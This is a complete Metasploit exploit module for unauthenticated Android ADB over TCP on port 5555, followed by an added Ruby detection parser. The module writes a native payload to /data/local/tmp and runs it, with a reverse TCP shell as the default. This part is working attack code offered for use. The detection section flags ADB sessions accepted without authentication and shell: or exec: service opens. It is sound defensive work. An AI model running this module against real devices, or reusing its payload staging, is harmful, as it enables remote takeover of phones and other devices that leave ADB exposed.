Android ADB Debug Server Remote Payload Execution Exploit
Source: metasploit.com  Author: joev  Published: 2016-01-25
##
# This module requires Metasploit: http://metasploit.com/download
##
  
require 'msf/core'
require 'rex/proto/adb'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Android ADB Debug Server Remote Payload Execution',
      'Description'    => %q{
        Writes and spawns a native payload on an android device that is listening
        for adb debug messages.
      },
      'Author'         => ['joev'],
      'License'        => MSF_LICENSE,
      'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
      'Platform'       => 'linux',
      'Arch'           => [ARCH_ARMLE, ARCH_X86, ARCH_X86_64, ARCH_MIPSLE],
      'Targets'        => [
        ['armle',  {'Arch' => ARCH_ARMLE}],
        ['x86',    {'Arch' => ARCH_X86}],
        ['x64',    {'Arch' => ARCH_X86_64}],
        ['mipsle', {'Arch' => ARCH_MIPSLE}]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 01 2016'
    ))
  
    register_options([
      Opt::RPORT(5555),
      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
    ], self.class)
  end
  
  def check
    setup_adb_connection do
      device_info = @adb_client.connect.data
      print_good "Detected device:\n#{device_info}"
      return Exploit::CheckCode::Vulnerable
    end
  
    Exploit::CheckCode::Unknown
  end
  
  def execute_command(cmd, opts)
    response = @adb_client.exec_cmd(cmd)
    print_good "Command executed, response:\n #{response}"
  end
  
  def exploit
    setup_adb_connection do
      device_data = @adb_client.connect
      print_good "Connected to device:\n#{device_data.data}"
      execute_cmdstager({
        flavor: :echo,
        enc_format: :octal,
        prefix: '\\\\0',
        temp: datastore['WritableDir'],
        linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8,
        background: true,
        nodelete: true
      })
    end
  end
  
  def setup_adb_connection(&blk)
    begin
      print_status "Connecting to device..."
      connect
      @adb_client = Rex::Proto::ADB::Client.new(sock)
      blk.call
    ensure
      disconnect
    end
  end
  
end
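
Added detection example, not part of the Metasploit module or the Rex library: a Ruby parser for the ADB wire format (24-byte little-endian header whose magic field is the command XOR 0xffffffff) that flags a session the device accepted without an AUTH challenge and any shell:/exec: service open in reassembled traffic to port 5555. The helper names (`adb_frame`, `parse_adb_stream`, `adb_alerts`) and the sample frames are constructed for illustration.

```ruby
# Added example; helper names and sample frames are constructed, not from the module.
ADB_COMMANDS = {
  0x4e584e43 => 'CNXN', 0x4e45504f => 'OPEN', 0x45545257 => 'WRTE',
  0x59414b4f => 'OKAY', 0x45534c43 => 'CLSE', 0x48545541 => 'AUTH'
}.freeze
HEADER_LEN = 24

# Build one frame; used here only to construct the sample input below.
def adb_frame(name, arg0, arg1, data)
  cmd = ADB_COMMANDS.key(name)
  data = data.b
  [cmd, arg0, arg1, data.bytesize, data.bytes.sum & 0xffffffff, cmd ^ 0xffffffff].pack('V6') + data
end

# Split one direction of a reassembled TCP stream into ADB messages.
# Stops at the first header that is not ADB or whose payload is truncated.
def parse_adb_stream(bytes)
  msgs = []
  off = 0
  while bytes.bytesize - off >= HEADER_LEN
    cmd, arg0, arg1, len, _sum, magic = bytes.byteslice(off, HEADER_LEN).unpack('V6')
    break unless ADB_COMMANDS.key?(cmd) && magic == (cmd ^ 0xffffffff)
    data = bytes.byteslice(off + HEADER_LEN, len) || ''
    break if data.bytesize < len
    msgs << { cmd: ADB_COMMANDS[cmd], arg0: arg0, arg1: arg1, data: data }
    off += HEADER_LEN + len
  end
  msgs
end

# Alert on a device CNXN reply that was never preceded by AUTH (the device
# accepted the host without key authentication) and on shell:/exec: opens.
def adb_alerts(client_bytes, device_bytes)
  client = parse_adb_stream(client_bytes)
  device = parse_adb_stream(device_bytes).map { |m| m[:cmd] }
  alerts = []
  if client.any? { |m| m[:cmd] == 'CNXN' } && device.include?('CNXN') && !device.include?('AUTH')
    alerts << 'adb session accepted without AUTH'
  end
  client.select { |m| m[:cmd] == 'OPEN' }.each do |m|
    svc = m[:data].delete("\0")
    alerts << "service opened: #{svc[0, 60]}" if svc.start_with?('shell:', 'exec:')
  end
  alerts
end

# Constructed sample traffic (not a real capture).
HOST_CNXN = adb_frame('CNXN', 0x01000000, 4096, "host::\0")
DEV_CNXN  = adb_frame('CNXN', 0x01000000, 4096, "device::ro.product.name=example;\0")
HOST_OPEN = adb_frame('OPEN', 1, 0, "shell:id\0")
DEV_AUTH  = adb_frame('AUTH', 1, 0, 'x' * 20)
```

Feed `adb_alerts` the two directions of a flow separately; an alert on a device that should require key authentication means ADB over TCP is enabled and unauthenticated, which is the condition the module's `check` reports.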

 